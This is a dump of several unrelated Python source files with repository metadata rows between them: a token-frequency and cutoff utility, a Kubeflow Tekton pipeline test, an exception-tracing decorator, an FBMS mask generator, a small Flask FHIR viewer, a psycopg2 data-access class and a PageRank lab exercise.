] | 2 | 2021-06-23T08:52:20.000Z | 2021-06-23T08:52:31.000Z | util/counter.py | FadedCosine/POS-Guided-Neural-Text-Generation | 2b5c72d8f2e08cbf4fe0babc4a4f1db09b348505 | [
"Apache-2.0"
] | null | null | null | util/counter.py | FadedCosine/POS-Guided-Neural-Text-Generation | 2b5c72d8f2e08cbf4fe0babc4a4f1db09b348505 | [
"Apache-2.0"
] | null | null | null | import collections
import pandas as pd
import numpy as np
import re
import os
def count(fl, target='input_context', checks=('input_keyword',), vocab_size=10000):
    """Count token frequencies over the files in `fl`; return cumulative
    probabilities (most frequent first) and an old-index -> rank mapping."""
    cnter = collections.Counter()
    s = set()
for filename in fl:
cur_df = pd.read_pickle(filename)
texts = cur_df[target].tolist()
for i in texts:
cnter.update(i[1:])
s.add(i[0])
#check
for filename in fl:
cur_df = pd.read_pickle(filename)
for check in checks:
texts = cur_df[check].tolist()
for i in texts:
s.update(i)
for i in s:
if i not in cnter:
cnter[i] = 1
for i in range(vocab_size):
if i not in cnter:
cnter[i] = 1
tot = 0
cum_prob = [0]
for i in cnter.most_common():
tot += i[1]
for i in cnter.most_common():
cum_prob.append(cum_prob[-1] + i[1] / tot)
cum_prob.pop(0)
new_dict = dict([(int(old[0]), int(new)) for (new, old) in enumerate(cnter.most_common())])
return cum_prob, new_dict
def convert_and_save(fl,dic,targets:list):
for filename in fl:
cur_df = convert_idx(filename,dic,targets)
new_filename = re.sub(r'indexed/','indexed_new/',filename)
if not os.path.exists(os.path.dirname(new_filename)):
os.makedirs(os.path.dirname(new_filename))
cur_df.to_pickle(new_filename)
def convert_idx(filename, dic, targets:list):
key_type = type(list(dic)[0])
cur_df = pd.read_pickle(filename)
for target in targets:
new = []
for line in cur_df[target].tolist():
converted = []
for token in line:
converted.append(dic[key_type(token)])
new.append(converted)
cur_df[target] = new
return cur_df
def old_compute_cutoffs(probs,n_cutoffs):
cutoffs = []
cut_prob = 1/n_cutoffs
cnt = 0
target_probs = cut_prob
for idx,prob in enumerate(probs):
if prob>target_probs:
cutoffs.append(idx + 1)
target_probs += cut_prob
cnt +=1
if cnt >= n_cutoffs -1:
break
return cutoffs
def uniform_cutoffs(probs,n_cutoffs):
per_cluster_n = len(probs) // n_cutoffs
return [per_cluster_n * i for i in range(1,n_cutoffs)]
def compute_cutoffs(probs,n_cutoffs):
def rebalance_cutprob():
remaining_prob = 1 - prior_cluster_prob
n = n_cutoffs - cnt
return remaining_prob / n
cutoffs = []
cut_prob = 1/n_cutoffs
cnt = 0
prior_cluster_prob = 0.0
prior_idx = 0
for idx, prob in enumerate(probs):
cluster_cumprob = prob - prior_cluster_prob
if cluster_cumprob > cut_prob:
if idx != prior_idx:
cutoffs.append(idx)
prior_cluster_prob = probs[idx-1]
prior_idx = idx
else:
cutoffs.append(idx+1)
prior_cluster_prob = probs[idx]
prior_idx = idx + 1
cnt += 1
cut_prob = rebalance_cutprob()
if cnt >= n_cutoffs -1:
break
return cutoffs
def cumulative_to_individual(cum_prob):
cum_prob.insert(0, 0)
new = []
for i in range(1,len(cum_prob)):
new.append(cum_prob[i] - cum_prob[i - 1])
cum_prob.pop(0)
return new
def normalized_entropy(x):
    """Shannon entropy of x (normalised to sum to 1), divided by log2(len(x))
    so the result lies in [0, 1]; 1.0 means a perfectly uniform distribution."""
    if len(x) == 1:
return 1.0
x = np.array(x)
x = x / np.sum(x)
entropy = -np.sum(x*np.log2(x))
z = np.log2(len(x))
return entropy / z
def cluster_probs(probs,cutoffs):
p = [probs[cutoffs[0]-1]]
for l,r in zip(cutoffs[:-1], cutoffs[1:]):
p.append(probs[r-1]-probs[l-1])
p.append(1.0-probs[cutoffs[-1]])
return p
def ideal_cutoffs(probs,lower=2,upper=None):
    ind_probs = cumulative_to_individual(probs)
ideal = None
max_mean = 0
if not upper:
upper = int(1 / probs[0])
for target in range(lower,upper+1):
mean = []
cutoffs = compute_cutoffs(probs,target)
added_cutoffs = [0] + cutoffs + [len(probs)]
for i in range(target):
cluster = ind_probs[added_cutoffs[i]:added_cutoffs[i + 1]]
mean.append(normalized_entropy(cluster))
cluster_prob = cluster_probs(probs,cutoffs)
head = normalized_entropy(cluster_prob)
tail = np.sum(np.array(mean)) / np.array(mean).nonzero()[0].size
mean = head * tail
# print(head, tail, mean)
if mean > max_mean:
max_mean = mean
ideal = cutoffs
return ideal
| 27.807229 | 95 | 0.581672 | 655 | 4,616 | 3.926718 | 0.180153 | 0.029938 | 0.020995 | 0.017107 | 0.251555 | 0.145801 | 0.101477 | 0.073872 | 0.05832 | 0.031104 | 0 | 0.019074 | 0.307192 | 4,616 | 165 | 96 | 27.975758 | 0.785178 | 0.006283 | 0 | 0.258993 | 0 | 0 | 0.010039 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079137 | false | 0 | 0.035971 | 0 | 0.194245 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7118f625a826be6f20337e189488ef58415fddb | 1,972 | py | Python | sdk/python/tests/compiler/testdata/tekton_loop_dsl.py | kubeflow/kfp-tekton | b16bd8863aaf36de240b7306f501d62b95f01f31 | [
"Apache-2.0"
] | 102 | 2019-10-23T20:35:41.000Z | 2022-03-27T10:28:56.000Z | sdk/python/tests/compiler/testdata/tekton_loop_dsl.py | kubeflow/kfp-tekton | b16bd8863aaf36de240b7306f501d62b95f01f31 | [
"Apache-2.0"
] | 891 | 2019-10-24T04:08:17.000Z | 2022-03-31T22:45:40.000Z | sdk/python/tests/compiler/testdata/tekton_loop_dsl.py | kubeflow/kfp-tekton | b16bd8863aaf36de240b7306f501d62b95f01f31 | [
"Apache-2.0"
] | 85 | 2019-10-24T04:04:36.000Z | 2022-03-01T10:52:57.000Z | # Copyright 2021 kubeflow.org
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import kfp.dsl as dsl
from kfp import components
from kfp_tekton import tekton
op1_yaml = '''\
name: 'my-in-coop1'
inputs:
- {name: item, type: Integer}
- {name: my_pipe_param, type: Integer}
implementation:
container:
image: library/bash:4.4.23
command: ['sh', '-c']
args:
- |
set -e
echo op1 "$0" "$1"
- {inputValue: item}
- {inputValue: my_pipe_param}
'''
@dsl.pipeline(name='my-pipeline')
def pipeline(my_pipe_param: int = 10):
loop_args = [1, 2]
# The DSL above should produce the same result and the DSL in the bottom
# with dsl.ParallelFor(loop_args, parallelism=1) as item:
# op1_template = components.load_component_from_text(op1_yaml)
# op1 = op1_template(item, my_pipe_param)
# condi_1 = tekton.CEL_ConditionOp(f"{item} == 0").output
# with dsl.Condition(condi_1 == 'true'):
# tekton.Break()
with tekton.Loop.sequential(loop_args) as item:
op1_template = components.load_component_from_text(op1_yaml)
op1 = op1_template(item, my_pipe_param)
condi_1 = tekton.CEL_ConditionOp(f"{item} == 1").output
with dsl.Condition(condi_1 == 'true'):
tekton.Break()
if __name__ == '__main__':
from kfp_tekton.compiler import TektonCompiler
TektonCompiler().compile(pipeline, __file__.replace('.py', '.yaml'))
| 34 | 76 | 0.674949 | 274 | 1,972 | 4.689781 | 0.467153 | 0.046693 | 0.042802 | 0.024903 | 0.245914 | 0.245914 | 0.245914 | 0.245914 | 0.245914 | 0.178988 | 0 | 0.023271 | 0.215517 | 1,972 | 57 | 77 | 34.596491 | 0.807369 | 0.462475 | 0 | 0 | 0 | 0 | 0.361886 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.129032 | 0 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e715ae23973f203c68cfe998932183b2bad3bee2 | 6,966 | py | Python | excptr/excptr.py | kakkarja/Excptr | 2ed1b40da339130eb15770c1cc91e94e3a17690f | [
"BSD-3-Clause"
] | null | null | null | excptr/excptr.py | kakkarja/Excptr | 2ed1b40da339130eb15770c1cc91e94e3a17690f | [
"BSD-3-Clause"
] | null | null | null | excptr/excptr.py | kakkarja/Excptr | 2ed1b40da339130eb15770c1cc91e94e3a17690f | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2022, KarjaKAK
# All rights reserved.
from functools import wraps
from textwrap import fill
from contextlib import redirect_stdout
from datetime import datetime as dt
import io, inspect, os, sys
__all__ = ["defd", "excp", "excpcls", "DEFAULTDIR", "DEFAULTFILE"]
DIRPATH = (
os.environ["USERPROFILE"] if sys.platform.startswith("win") else os.environ["HOME"]
)
DEFAULTDIR = os.path.join(DIRPATH, "EXCPTR")
DEFAULTFILE = os.path.join(
DEFAULTDIR, f"{int(dt.timestamp(dt.today().replace(microsecond=0)))}_EXCPTR.log"
)
def defd():
"""Create default directory"""
if not os.path.isdir(DEFAULTDIR):
os.mkdir(DEFAULTDIR)
else:
raise Exception(f"{DEFAULTDIR} is already exist!")
def prex(details, exc_tr, fc_name):
"""Printing Exception"""
print(f"\nFilename caller: {details[0].filename.upper()}\n")
print(f"ERROR - <{fc_name}>:")
print(f"{'-' * 70}", end="\n")
print("Start at:\n")
filenm = details[0].filename
for detail in details:
if "excptr.py" not in detail.filename:
if filenm != detail.filename:
print(f"Filename: {detail.filename.upper()}\n")
cc = fill(
"".join(detail.code_context).strip(),
initial_indent=" " * 4,
subsequent_indent=" " * 4,
)
print(f"line {detail.lineno} in {detail.function}:\n" f"{cc}\n")
del cc
del detail
tot = f">>>- Exception raise: {exc_tr.__class__.__name__} ->"
print("~" * len(tot))
print(tot)
print("~" * len(tot) + "\n")
allextr = inspect.getinnerframes(exc_tr.__traceback__)[1:]
for extr in allextr:
if "excptr.py" not in extr.filename:
if filenm != extr.filename:
print(f"Filename: {extr.filename.upper()}\n")
cc = fill(
"".join(extr.code_context).strip(),
initial_indent=" " * 4,
subsequent_indent=" " * 4,
)
print(f"line {extr.lineno} in {extr.function}:\n" f"{cc}\n")
del cc
del extr
print(f"{exc_tr.__class__.__name__}: {exc_tr.args[0]}")
print(f"{'-' * 70}", end="\n")
del tot, allextr, filenm, details, exc_tr, fc_name
def crtk(v: str):
"""Tkinter gui display"""
import tkinter as tk
from tkinter import messagebox as msg
root = tk.Tk()
root.title("Exception Error Messages")
root.attributes("-topmost", 1)
text = tk.Listbox(root, relief=tk.FLAT, width=70, selectbackground="light green")
text.pack(side="left", expand=1, fill=tk.BOTH, pady=2, padx=(2, 0))
scr = tk.Scrollbar(root, orient=tk.VERTICAL)
scr.pack(side="right", fill=tk.BOTH)
scr.config(command=text.yview)
text.config(yscrollcommand=scr.set)
val = v.splitlines()
for v in val:
text.insert(tk.END, v)
text.config(
state=tk.DISABLED,
bg="grey97",
disabledforeground="black",
font="courier 12",
height=len(val),
)
del val, v
scnd = 5000
def viewing():
nonlocal scnd
scnd += scnd if scnd < 20000 else 5000
match scnd:
case sec if sec <= 25000:
ans = msg.askyesno(
"Viewing",
f"Still viewing for another {scnd//1000} seconds?",
parent=root,
)
if ans:
root.after(scnd, viewing)
else:
root.destroy()
case sec if sec > 25000:
msg.showinfo(
"Viewing", "Viewing cannot exceed more than 1 minute!", parent=root
)
root.destroy()
root.after(5000, viewing)
root.mainloop()
del root, text, scr, scnd
def ckrflex(filenm: str) -> bool:
"""Checking file existence or an empty file"""
if os.path.exists(filenm):
with open(filenm) as rd:
if rd.readline():
return False
else:
return True
else:
return True
def excp(m: int = -1, filenm: str = None):
"""Decorator for function"""
match m:
case m if not isinstance(m, int):
raise ValueError(f'm = "{m}" Need to be int instead!')
case m if m not in [-1, 0, 1, 2]:
raise ValueError(
f'm = "{m}" Need to be either one of them, [-1 or 0 or 1 or 2]!'
)
def ckerr(f):
ckb = m
@wraps(f)
def trac(*args, **kwargs):
try:
                return f(*args, **kwargs)  # propagate the result unchanged, even when falsy
except Exception as e:
details = inspect.stack()[1:][::-1]
match ckb:
case -1:
raise
case 0:
prex(details, e, f.__name__)
case 1:
v = io.StringIO()
with redirect_stdout(v):
prex(details, e, f.__name__)
crtk(v.getvalue())
v.flush()
case 2:
if filenm:
v = io.StringIO()
with redirect_stdout(v):
prex(details, e, f.__name__)
wrm = (
str(dt.today()).rpartition(".")[0]
+ ": TRACING EXCEPTION\n"
if ckrflex(filenm)
else "\n"
+ str(dt.today()).rpartition(".")[0]
+ ": TRACING EXCEPTION\n"
)
with open(filenm, "a") as log:
log.write(wrm)
log.write(v.getvalue())
v.flush()
del v, wrm
else:
raise
del details, e
return trac
return ckerr
def excpcls(m: int = -1, filenm: str = None):
"""Decorator for class (for functions only)"""
match m:
case m if not isinstance(m, int):
raise ValueError(f'm = "{m}" Need to be int instead!')
case m if m not in [-1, 0, 1, 2]:
raise ValueError(
f'm = "{m}" Need to be either one of them, [-1 or 0 or 1 or 2]!'
)
def catchcall(cls):
ckb = m
match cls:
case cls if not inspect.isclass(cls):
raise TypeError("Type error, suppose to be a class!")
case _:
for name, obj in vars(cls).items():
if inspect.isfunction(obj):
setattr(cls, name, excp(ckb, filenm)(obj))
return cls
return catchcall
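
# A minimal usage sketch (illustrative; m=0 prints the report to stdout):
if __name__ == "__main__":
    @excp(m=0)
    def risky(x):
        return 1 / x

    risky(0)  # prints a formatted traceback report instead of raising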
| 30.419214 | 87 | 0.47617 | 786 | 6,966 | 4.148855 | 0.310433 | 0.016559 | 0.008586 | 0.020853 | 0.26035 | 0.217111 | 0.202392 | 0.202392 | 0.147807 | 0.147807 | 0 | 0.020863 | 0.401378 | 6,966 | 228 | 88 | 30.552632 | 0.761151 | 0.034597 | 0 | 0.252747 | 0 | 0.010989 | 0.143305 | 0.030335 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054945 | false | 0 | 0.038462 | 0 | 0.137363 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7184bb619f9cf0c50a0b0b91431faa51ba55646 | 4,968 | py | Python | fbms/create_fg_bg_masks.py | MSiam/segment-any-moving | 82cb782867d866d2f4eb68230edb75f613e15a02 | [
"Apache-2.0"
] | 70 | 2019-09-16T17:55:55.000Z | 2022-03-07T00:26:53.000Z | fbms/create_fg_bg_masks.py | MSiam/segment-any-moving | 82cb782867d866d2f4eb68230edb75f613e15a02 | [
"Apache-2.0"
] | 9 | 2019-09-30T09:15:11.000Z | 2021-07-21T11:33:13.000Z | fbms/create_fg_bg_masks.py | MSiam/segment-any-moving | 82cb782867d866d2f4eb68230edb75f613e15a02 | [
"Apache-2.0"
] | 5 | 2019-09-25T05:14:37.000Z | 2021-07-08T20:13:47.000Z | """Create foreground/background motion masks from detections."""
import argparse
import logging
import pickle
import pprint
from pathlib import Path
import numpy as np
from PIL import Image
import pycocotools.mask as mask_util
from utils.fbms import utils as fbms_utils
from utils.log import add_time_to_path, setup_logging
def create_masks_sequence(groundtruth_dir, predictions_dir, output_dir,
threshold):
groundtruth = fbms_utils.FbmsGroundtruth(groundtruth_dir / 'GroundTruth')
mask_shape = None
for frame_number, frame_path in groundtruth.frame_label_paths.items():
filename = frame_path.stem
filename = filename.replace('_gt', '')
pickle_file = predictions_dir / (filename + '.pickle')
output_path = output_dir / (filename + '.png')
if output_path.exists():
continue
if not pickle_file.exists():
logging.warn("Couldn't find detections for "
f"{pickle_file.relative_to(predictions_dir.parent)}")
continue
if mask_shape is None:
image_size = Image.open(frame_path).size
mask_shape = (image_size[1], image_size[0])
with open(pickle_file, 'rb') as f:
frame_data = pickle.load(f)
if frame_data['segmentations'] is None:
frame_data['segmentations'] = [
[] for _ in range(len(frame_data['boxes']))
]
segmentations = []
scores = []
        # Merge all foreground classes into one (index 0 is the background class).
for c in range(1, len(frame_data['segmentations'])):
scores.extend(frame_data['boxes'][c][:, 4])
segmentations.extend(frame_data['segmentations'][c])
final_mask = np.zeros(mask_shape, dtype=np.uint8)
for score, segmentation in zip(scores, segmentations):
if score <= threshold:
continue
mask = mask_util.decode(segmentation)
final_mask[mask == 1] = 255
Image.fromarray(final_mask).save(output_path)
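# Detection pickle layout assumed by create_masks_sequence (inferred from the
# access pattern above): frame_data['boxes'][c] is an (N, 5) array per class c
# whose 5th column is the score, and frame_data['segmentations'][c] is the
# matching list of COCO-style RLE masks.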
def create_masks_split(groundtruth_dir, predictions_dir, output_dir,
threshold):
"""
Args:
groundtruth_dir (Path)
predictions_dir (Path)
output_dir (Path)
"""
for sequence_groundtruth in groundtruth_dir.iterdir():
if not sequence_groundtruth.is_dir():
continue
sequence_predictions = predictions_dir / sequence_groundtruth.name
sequence_output = output_dir / sequence_groundtruth.name
assert sequence_predictions.exists(), (
f"Couldn't find sequence predictions at {sequence_predictions}")
sequence_output.mkdir(exist_ok=True, parents=True)
create_masks_sequence(sequence_groundtruth, sequence_predictions,
sequence_output, threshold)
def main():
# Use first line of file docstring as description if it exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--detections-root', type=Path, required=True)
parser.add_argument('--fbms-root', type=Path, required=True)
parser.add_argument('--output-dir', type=Path, required=True)
parser.add_argument('--threshold', type=float, default=0.7)
args = parser.parse_args()
fbms_root = args.fbms_root
detections_root = args.detections_root
output_dir = args.output_dir
# assert not output_dir.exists()
assert detections_root.exists()
assert fbms_root.exists()
output_dir.mkdir(exist_ok=True, parents=True)
setup_logging(
add_time_to_path(output_dir / (Path(__file__).name + '.log')))
logging.info('Args: %s\n', pprint.pformat(vars(args)))
train_split = 'TrainingSet'
train_fbms = fbms_root / train_split
if train_fbms.exists():
train_detections = detections_root / train_split
train_output = output_dir / train_split
assert train_detections.exists(), (
f'No detections found for TrainingSet at {train_detections}')
create_masks_split(train_fbms, train_detections, train_output,
args.threshold)
test_split = 'TestSet'
test_fbms = fbms_root / test_split
if test_fbms.exists():
test_detections = detections_root / test_split
test_output = output_dir / test_split
assert test_detections.exists(), (
f'No detections found for TestSet at {test_detections}')
create_masks_split(test_fbms, test_detections, test_output,
args.threshold)
if not (train_fbms.exists() or test_fbms.exists()):
# Assume that --fbms-root and --detections-root refer to a specific
# split.
create_masks_split(fbms_root, detections_root, output_dir,
args.threshold)
if __name__ == "__main__":
main()
| 35.741007 | 78 | 0.652576 | 582 | 4,968 | 5.292096 | 0.254296 | 0.040909 | 0.028571 | 0.019481 | 0.127597 | 0.110065 | 0.092532 | 0.026623 | 0 | 0 | 0 | 0.003236 | 0.253623 | 4,968 | 138 | 79 | 36 | 0.8274 | 0.067432 | 0 | 0.090909 | 0 | 0 | 0.093342 | 0.015448 | 0 | 0 | 0 | 0 | 0.050505 | 1 | 0.030303 | false | 0 | 0.10101 | 0 | 0.131313 | 0.020202 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e719d280906322349a44262ff73a7f9f71dcec17 | 511 | py | Python | web_app/main.py | dimagi/commcare-fhir-web-app | c0afec94a177b79ee8314ac29692d0697567e1f2 | [
"Apache-2.0"
] | null | null | null | web_app/main.py | dimagi/commcare-fhir-web-app | c0afec94a177b79ee8314ac29692d0697567e1f2 | [
"Apache-2.0"
] | 3 | 2021-04-19T16:03:45.000Z | 2021-05-06T11:11:21.000Z | web_app/main.py | dimagi/commcare-fhir-web-app | c0afec94a177b79ee8314ac29692d0697567e1f2 | [
"Apache-2.0"
] | null | null | null | from flask import Flask, render_template, request
from web_app.fhir_client import fetch_patient_data
app = Flask(__name__)
@app.route('/')
def root():
return render_template('root.html')
@app.route('/patient/')
def view_patient():
patient_id = request.args['patient_id']
patient, observations, diag_reports = fetch_patient_data(patient_id)
return render_template(
"patient.html",
patient=patient,
observations=observations,
diag_reports=diag_reports,
)
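# Local run sketch (assumes this module is the Flask entry point):
#     $ FLASK_APP=web_app.main flask run
#     # then visit /patient/?patient_id=<some id> in a browser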
| 22.217391 | 72 | 0.708415 | 62 | 511 | 5.516129 | 0.403226 | 0.122807 | 0.093567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183953 | 511 | 22 | 73 | 23.227273 | 0.820144 | 0 | 0 | 0 | 0 | 0 | 0.080235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0.0625 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e71b58e87dfbb0a1a266b2ea42679908ef474085 | 1,070 | py | Python | plugml/dao.py | mkraemer67/plugml | d1702a2b733e0511c735fea08e30b5b3f959a174 | [
"Apache-2.0"
] | 1 | 2015-03-26T13:28:47.000Z | 2015-03-26T13:28:47.000Z | plugml/dao.py | mkraemer67/plugml | d1702a2b733e0511c735fea08e30b5b3f959a174 | [
"Apache-2.0"
] | null | null | null | plugml/dao.py | mkraemer67/plugml | d1702a2b733e0511c735fea08e30b5b3f959a174 | [
"Apache-2.0"
] | null | null | null | import psycopg2
class Dao:
def __init__(self, dbUrl):
self._url = dbUrl
def __enter__(self):
conn = psycopg2.connect(self._url)
self.conn = conn
class _Dao:
def get(self, table, orderBy="id", limit=None):
cursor = conn.cursor()
sql = "SELECT * FROM %s ORDER BY %s" % (table, orderBy)
if limit:
sql += " LIMIT %i" % limit
cursor.execute(sql)
return cursor.fetchall()
def put(self, table, data):
cursor = conn.cursor()
cursor.execute("DELETE FROM %s" % table)
for i, vec in data:
sql = "INSERT INTO %s VALUES (%%s, %%s)" % table
arr = "{" + ','.join([str(x) for x in vec]) + "}"
cursor.execute(sql, (i, arr))
conn.commit()
return True
return _Dao()
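    # Usage sketch (hypothetical DSN and table; note that table names are
    # interpolated directly into the SQL, so pass trusted identifiers only):
    #     with Dao("postgresql://user:pass@localhost/mydb") as dao:
    #         dao.put("vectors", [(1, [0.1, 0.2]), (2, [0.3, 0.4])])
    #         rows = dao.get("vectors", limit=10)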
def __exit__(self, type, value, traceback):
self.conn.close() | 32.424242 | 72 | 0.447664 | 111 | 1,070 | 4.171171 | 0.45045 | 0.038877 | 0.047516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003306 | 0.434579 | 1,070 | 33 | 73 | 32.424242 | 0.761983 | 0 | 0 | 0.074074 | 0 | 0 | 0.084697 | 0 | 0.037037 | 0 | 0 | 0 | 0 | 1 | 0.185185 | false | 0 | 0.037037 | 0 | 0.407407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e71fe0afc69089b13f571b743733ac7787ae15e6 | 394 | py | Python | website/models/home_tab.py | LKKTGB/lkk-website | d9cd2f5a11f2b4316ea4b242c5e09981207abdfb | [
"MIT"
] | null | null | null | website/models/home_tab.py | LKKTGB/lkk-website | d9cd2f5a11f2b4316ea4b242c5e09981207abdfb | [
"MIT"
] | 5 | 2020-04-26T09:03:33.000Z | 2022-02-02T13:00:39.000Z | website/models/home_tab.py | LKKTGB/lkk-website | d9cd2f5a11f2b4316ea4b242c5e09981207abdfb | [
"MIT"
] | null | null | null | from django.db import models
from django.utils.translation import ugettext_lazy as _
class HomeTab(models.Model):
name = models.CharField(_('home_tab_name'), max_length=100)
order = models.PositiveSmallIntegerField(_('home_tab_order'))
class Meta:
verbose_name = _('home_tab')
verbose_name_plural = _('home_tabs')
def __str__(self):
return self.name
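# Query sketch (assumes a standard Django setup):
#     tabs = HomeTab.objects.order_by("order")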
| 26.266667 | 65 | 0.708122 | 49 | 394 | 5.285714 | 0.612245 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009404 | 0.190355 | 394 | 14 | 66 | 28.142857 | 0.802508 | 0 | 0 | 0 | 0 | 0 | 0.111675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0.1 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e726ce3420ac33849733ba1549bfbf5f6cbd4bab | 2,085 | py | Python | src/Chap13_Lab_PageRank.py | falconlee236/CodingTheMatrix-Answer | 4fab8087bde352913da71c8d86b802a93231b1b5 | [
"MIT"
] | null | null | null | src/Chap13_Lab_PageRank.py | falconlee236/CodingTheMatrix-Answer | 4fab8087bde352913da71c8d86b802a93231b1b5 | [
"MIT"
] | null | null | null | src/Chap13_Lab_PageRank.py | falconlee236/CodingTheMatrix-Answer | 4fab8087bde352913da71c8d86b802a93231b1b5 | [
"MIT"
] | null | null | null | from pagerank_test import small_links, A2
from pagerank import find_word, read_data
from vec import Vec
from mat import Mat
from math import sqrt
# Task 13.12.1
def find_num_links(L):
return Vec(L.D[0], {key: 1 for key in L.D[0]}) * L
# Task 13.12.2
def make_Markov(L):
num_links = find_num_links(L)
for i in L.f:
L[i] /= num_links[i[1]]
make_Markov(small_links)
# Task 13.12.3
def power_method(A1, k):
v = Vec(A1.D[1], {key: 1 for key in A1.D[1]})
col_len = len(A1.D[1])
for i in range(k):
sub_v = 0.15 * v
sum_v = sum(sub_v.f.values())
A2_vec = Vec(sub_v.D, {key: sum_v / col_len for key in sub_v.D})
u = 0.85 * A1 * v + A2_vec
print(sqrt((v * v) / (u * u)))
v = u
return v
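# The loop above is the damped PageRank update u = 0.85 * A1 * v + teleport,
# where the teleport vector redistributes the remaining 15% of the weight
# uniformly; the printed sqrt((v*v)/(u*u)) is a convergence diagnostic.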
# Task 13.12.4
links = read_data("links.bin")
# Task 13.12.5
def wikigoogle(w, k, p):
related = find_word(w)
related.sort(key=lambda x: p[x], reverse=True)
return related[:k]
# Task 13.12.6
make_Markov(links)
eigenvec = power_method(links, 2)
jordanlist = wikigoogle("jordan", 10, eigenvec)
# Task 13.12.7
def power_method_biased(A1, k, r):
v = Vec(A1.D[1], {key: 1 for key in A1.D[1]})
col_len = len(A1.D[1])
for i in range(k):
sub_v = 0.15 * v
sum_v = sum(sub_v.f.values())
Ar = 0.3 * Vec(A1.D[0], {r: sum(v.f.values())})
A2_vec = Vec(sub_v.D, {key: sum_v / col_len for key in sub_v.D})
u = 0.55 * A1 * v + A2_vec + Ar
print(sqrt((v * v) / (u * u)))
v = u
return v
sport_biased_eigenvec = power_method_biased(links, 2, "sport")
sport_biased_jordanlist = wikigoogle("jordan", 10, sport_biased_eigenvec)
print(jordanlist)
print(sport_biased_jordanlist)
# Task 13.12.8
def wikigoogle2(words, k, p):
wordlist = [set(find_word(x)) for x in words]
related = wordlist[0]
for i in range(1, len(wordlist)):
related = related.intersection(wordlist[i])
    related = sorted(related, key=lambda x: p[x], reverse=True)  # related is a set here, so use sorted() rather than .sort()
return related[:k]
print(wikigoogle2(["jordan, tiger"], 10, sport_biased_eigenvec))
| 20.441176 | 73 | 0.608633 | 379 | 2,085 | 3.208443 | 0.208443 | 0.039474 | 0.052632 | 0.024671 | 0.322368 | 0.3125 | 0.3125 | 0.3125 | 0.3125 | 0.3125 | 0 | 0.060051 | 0.241247 | 2,085 | 101 | 74 | 20.643564 | 0.708597 | 0.0494 | 0 | 0.4 | 0 | 0 | 0.019847 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109091 | false | 0 | 0.090909 | 0.018182 | 0.290909 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7276f28ac4e072f7bd65b6f8eba2b3bc1b6fc22 | 4,695 | py | Python | tasks/parsing/parsers.py | rasmusbergpalm/attend-copy-parse | 4673be36db64e982ceabc1e29ff34a296917f969 | [
"MIT"
